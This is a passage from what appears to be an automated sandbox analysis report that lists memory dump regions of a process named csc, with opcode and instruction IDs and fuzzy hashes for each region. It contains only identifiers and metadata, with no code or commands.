                                                                                                                                              • Opcode Fuzzy Hash: a3ef5b4b3ad77928b70afe6edd2fa8d7a742ef8bdbb9127133f935c93ab76653
                                                                                                                                              • Instruction Fuzzy Hash: B65175713402418FDB545AEFC4A862EE6AFAFD4710F54453EA207C7298DFB58C4987A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3adc21977d13fb90b3ce1ec40c85be89a4fbf42451564c7a80b190a311a8fdd0
                                                                                                                                              • Instruction ID: 7fdfa1515e6bfb64bb46083dfe6328b5dd05e36fb237f27b9949113dbfbe1bae
                                                                                                                                              • Opcode Fuzzy Hash: 3adc21977d13fb90b3ce1ec40c85be89a4fbf42451564c7a80b190a311a8fdd0
                                                                                                                                              • Instruction Fuzzy Hash: 2C519831A012489FCB21DFA9C444BDEBFF1FF49310F15846AE459AB692C775A84ACF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 70cf0fe021f7f244e914603a3157ce688e37dd433bb57026f6da1912a999aaf4
                                                                                                                                              • Instruction ID: 4c5ec21bdc6dc3fef0620a436b296ffad2f8c04b58bde44e1151264a634a8088
                                                                                                                                              • Opcode Fuzzy Hash: 70cf0fe021f7f244e914603a3157ce688e37dd433bb57026f6da1912a999aaf4
                                                                                                                                              • Instruction Fuzzy Hash: BB414934A062548FDB65CF24CCA1F99BBB1AF46310F1581DAE949AB3E2C6319D81CF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a656de763d6db78d882009cd3fcc8820c3193b1bba45e3afec8ab5999f640ae5
                                                                                                                                              • Instruction ID: b8b0cbf57a04d03eef4b48536595fe649b54b98904909436b6c7d2bba4bcfe3b
                                                                                                                                              • Opcode Fuzzy Hash: a656de763d6db78d882009cd3fcc8820c3193b1bba45e3afec8ab5999f640ae5
                                                                                                                                              • Instruction Fuzzy Hash: 2D416AB0A05105DFEB34CF5DC086BAAB7B2FB84301F19C5A6D50A9B6A6D735E981CB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b228466759f4015c6829bb7df9ecd585569168ea06a16c77be225f67c573b35c
                                                                                                                                              • Instruction ID: 8c378c850e0f2e9190fab412f3d9ac13db14124debd3bdb27bc991d6a349fdcd
                                                                                                                                              • Opcode Fuzzy Hash: b228466759f4015c6829bb7df9ecd585569168ea06a16c77be225f67c573b35c
                                                                                                                                              • Instruction Fuzzy Hash: 0F3127B0605105DFEB34CF5DC086B7AB3A2FB84301F1A95A5D4069F6B6CB79ED81CA01
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ca21e67c3ec6a75b7423866241aa4a8677f65010140bf925d086cb24af63950f
                                                                                                                                              • Instruction ID: 9f3e850aaed983a0a46132ef42196c705596ae2f26667a8a47dcaee2edbdea23
                                                                                                                                              • Opcode Fuzzy Hash: ca21e67c3ec6a75b7423866241aa4a8677f65010140bf925d086cb24af63950f
                                                                                                                                              • Instruction Fuzzy Hash: 6E311F35A102199FDF14DFA4D855AEEB7B6FF88310F54C029E906B72A0DB71AD05CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: aaf34e53e5a70d940ee0f6c706befc6412ad948f5f0d74cb2896e90a4b5ccd78
                                                                                                                                              • Instruction ID: e336b002a4f9006c56667d6e8e514295ff219165b8942434b3766ee797d5695c
                                                                                                                                              • Opcode Fuzzy Hash: aaf34e53e5a70d940ee0f6c706befc6412ad948f5f0d74cb2896e90a4b5ccd78
                                                                                                                                              • Instruction Fuzzy Hash: A821FB357112409FCB24CE38D8905AD7772FBC9234B288A59EC569B3A1D731EC45CB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a30d76363605db19546c7f1db7823d181f11a2c91b8a90266e01b4458f7161f6
                                                                                                                                              • Instruction ID: b6819040082e520b78b8c485e24be91e849010d731393fb954a08e9120ce18a2
                                                                                                                                              • Opcode Fuzzy Hash: a30d76363605db19546c7f1db7823d181f11a2c91b8a90266e01b4458f7161f6
                                                                                                                                              • Instruction Fuzzy Hash: 3C21C435B106059BCB20DA68D890AAF7776FB84354F24C729DA0A977A4DB30EC45CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994505916.00000000095C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f2efd846a8c0a511edbfa8730742823c93957e8fab49937ddafeff9d200f19c5
                                                                                                                                              • Instruction ID: 9cf67ad7179d5f25d977abdabff5d9351799dca4fe77dd64429e20d256cc00cb
                                                                                                                                              • Opcode Fuzzy Hash: f2efd846a8c0a511edbfa8730742823c93957e8fab49937ddafeff9d200f19c5
                                                                                                                                              • Instruction Fuzzy Hash: 02210AB1709B914FC726577658A853EBBA7AFC6B0570881BFD502C7392DE748C068361
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9be692e82baa788561039f74fa84980d775b05a2c2d50368f62310da9f0c0eff
                                                                                                                                              • Instruction ID: 7bc8e130eee7af563a81ebf763553ce3aca59857a1aa43de0cf3f2806b9fab5a
                                                                                                                                              • Opcode Fuzzy Hash: 9be692e82baa788561039f74fa84980d775b05a2c2d50368f62310da9f0c0eff
                                                                                                                                              • Instruction Fuzzy Hash: 2F21B172A04348EFCB09DFA4D8408DEFBF9FF89300F0544AAE545DB261DA30A905CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cfb65bf0a7d3be4b029575ae12d44d2bbcc5d6ede203134358323a56d8178162
                                                                                                                                              • Instruction ID: ff390d8596a71ed708b2216757820b2a42159dcd8c139949ced536079ed419c7
                                                                                                                                              • Opcode Fuzzy Hash: cfb65bf0a7d3be4b029575ae12d44d2bbcc5d6ede203134358323a56d8178162
                                                                                                                                              • Instruction Fuzzy Hash: A2216575B009098FCB04EFA8D5449AEB7B5FFC9700B50952AD506A7364EF709E06CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4979ba2db4feb408aaf136a0fc8d23eeeb2a3d8cfad2d4ebfe8d9bf54a9eca7e
                                                                                                                                              • Instruction ID: c4ae4b83268df8e0dbe775c9420d6b79794765552ab0e3929a7f9b84fb10667b
                                                                                                                                              • Opcode Fuzzy Hash: 4979ba2db4feb408aaf136a0fc8d23eeeb2a3d8cfad2d4ebfe8d9bf54a9eca7e
                                                                                                                                              • Instruction Fuzzy Hash: AE314734A00204CFCB59DF68D4589DEBBF2FF89321B1585A9D44AAB261DB359C86CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              • Opcode Fuzzy Hash: 443a239b66eb8f80580bbbeeb366a763690907e96de71d4622b217bcaf609d37
                                                                                                                                              • Instruction Fuzzy Hash: 0B11AD30608289CFCB46DF64C59299DBBB2FF48300B218595D401AF276CB35DD49CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0083f71fbc116538a1259841cf7f128a21dee9735cc734291e791533323c7853
                                                                                                                                              • Instruction ID: 3d9f0fdd985a0d69b6bcdc33a18cccb39812b129e4de55cf310fbce014b52a42
                                                                                                                                              • Opcode Fuzzy Hash: 0083f71fbc116538a1259841cf7f128a21dee9735cc734291e791533323c7853
                                                                                                                                              • Instruction Fuzzy Hash: 84F02D35B0961087C70A2B37691471ABB727FC2751F0E407AD50ACF661DB36C8064391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1ddb2975508f28f130cda0071b839d1e667a20821e082e75904d2df855c8c3ef
                                                                                                                                              • Instruction ID: f80b266c6a03363d36dab83354ff7898c4c82273009dd34cce2d79eb8c391dda
                                                                                                                                              • Opcode Fuzzy Hash: 1ddb2975508f28f130cda0071b839d1e667a20821e082e75904d2df855c8c3ef
                                                                                                                                              • Instruction Fuzzy Hash: 17016D353016149FC3099B25D464A1EB7A6FFC9712B108129EA0A8B750DF75EC03CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: afed0b354af1b5d41549dd5b81b933dd58b04d23b43c009f105620ff24af2eb0
                                                                                                                                              • Instruction ID: 82f0a2dbb2a764309d9b173d449c2e982d2d6d883bd089246b2fb207974c88a6
                                                                                                                                              • Opcode Fuzzy Hash: afed0b354af1b5d41549dd5b81b933dd58b04d23b43c009f105620ff24af2eb0
                                                                                                                                              • Instruction Fuzzy Hash: 50F036317002019FCBB8EA1EF850A6AB3EAFBC4214F10853DD54AC7365DE71EC0A8B65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9020c180db985b8999d6076513db504304fe79d31f3dc395a5f757607fd24c7a
                                                                                                                                              • Instruction ID: 768b928791dedf27e51b6b3557c0d1171ee1bf706d17f4cbb70a3a2eef87700a
                                                                                                                                              • Opcode Fuzzy Hash: 9020c180db985b8999d6076513db504304fe79d31f3dc395a5f757607fd24c7a
                                                                                                                                              • Instruction Fuzzy Hash: 97F01272300210AFD7159B3A9868E6E77AAEBD9755F104479F606CF3A1C972DC018750
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5136dc12a50a1a2b20d6f6b03296a3b928c831d35d4a22bfb15af1dca474ee1
                                                                                                                                              • Instruction ID: 560aae3811903dea50a7ed0d46eb99cff69c96ed603494b311af58469aef2122
                                                                                                                                              • Opcode Fuzzy Hash: e5136dc12a50a1a2b20d6f6b03296a3b928c831d35d4a22bfb15af1dca474ee1
                                                                                                                                              • Instruction Fuzzy Hash: F0F04F71A002159FCB98EF7CE9416DEBBF9FF84210F10853AD50AD7250E770A945CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1e6e7c001594e39fbed61e2594214cfc992d95fd8758cc6102bd0611e92303d3
                                                                                                                                              • Instruction ID: ed11857cd9782e708f64c89e98857f3eb5adea1847556933b18992a28311ad93
                                                                                                                                              • Opcode Fuzzy Hash: 1e6e7c001594e39fbed61e2594214cfc992d95fd8758cc6102bd0611e92303d3
                                                                                                                                              • Instruction Fuzzy Hash: 15F08272A085289B9718CEAB98409AFBBEAFB88260B018536E619D7100E732880187D1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: de38af1e5c67934b4f04ae44da961a478048e5849ccc1fa215e35e794cb5dcb0
                                                                                                                                              • Instruction ID: 2ad552e5f4e79210ffda0d9579364ad1073d4503ea91fd4d641da4d58c215f9f
                                                                                                                                              • Opcode Fuzzy Hash: de38af1e5c67934b4f04ae44da961a478048e5849ccc1fa215e35e794cb5dcb0
                                                                                                                                              • Instruction Fuzzy Hash: 30F02E76F041248FC728CF67990526EF7E9FF84350B414079E80DE7100E73698044B81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 44e5b364f36f14bbba41afac791bdacd003f1d6d2b0dc57dc87f233c13e3b579
                                                                                                                                              • Instruction ID: 78adfb15799f5c40b7743a8de973163aba1e42322cd73f7a29bb6bbedd046dfd
                                                                                                                                              • Opcode Fuzzy Hash: 44e5b364f36f14bbba41afac791bdacd003f1d6d2b0dc57dc87f233c13e3b579
                                                                                                                                              • Instruction Fuzzy Hash: 48F054353006009F8B74966EE41056E77EBFBC42607148929D996C7754DF70EC098B95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0976b729b2e4465787f57846e5bb15dbb25b34aa18b029e527a86abc1b84eb83
                                                                                                                                              • Instruction ID: 98d23994f0d029515396ac4db035f191ccc2aad822fccd2bf57ef13953aaf391
                                                                                                                                              • Opcode Fuzzy Hash: 0976b729b2e4465787f57846e5bb15dbb25b34aa18b029e527a86abc1b84eb83
                                                                                                                                              • Instruction Fuzzy Hash: 22F054316453459FC719DB3AE880C9BBBAAEEC1320715C57BD01ACB136DB75980ACB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80cbd97864cecdc059f4a5ca1f148821b96f13d7d28bee6ce31fe5b892c7037c
                                                                                                                                              • Instruction ID: 9c33877658074065c8b38e298882d17e5a886143385f6f8f314512fa96b8a8d3
                                                                                                                                              • Opcode Fuzzy Hash: 80cbd97864cecdc059f4a5ca1f148821b96f13d7d28bee6ce31fe5b892c7037c
                                                                                                                                              • Instruction Fuzzy Hash: 3BF0A03224E3D05FC7168A66A89089A7FB59AD222031940FBE084CB453C6298C4AC7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3164c38367c9d18933f8bc7a1491a2a7455136fc69578c42bbc57eaf2baa50b1
                                                                                                                                              • Instruction ID: 596a6d0105ca2582ca7afb0d5d179617c949fca4ee86e25cfbd454ed39b54521
                                                                                                                                              • Opcode Fuzzy Hash: 3164c38367c9d18933f8bc7a1491a2a7455136fc69578c42bbc57eaf2baa50b1
                                                                                                                                              • Instruction Fuzzy Hash: 22F03AB1C0431ACFDB15CFA985012EEBBF4BF14300F48C1A6D154EB1A1E3398645CB94
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7764b851319a844557bb58a0a0667b22a6a2eaadd063e54f13c0191a2acc11c0
                                                                                                                                              • Instruction ID: 23e083b88a33efb826fb22c4d687a8b4fa2e55fcebd4edebc9ddce3e475f3a0e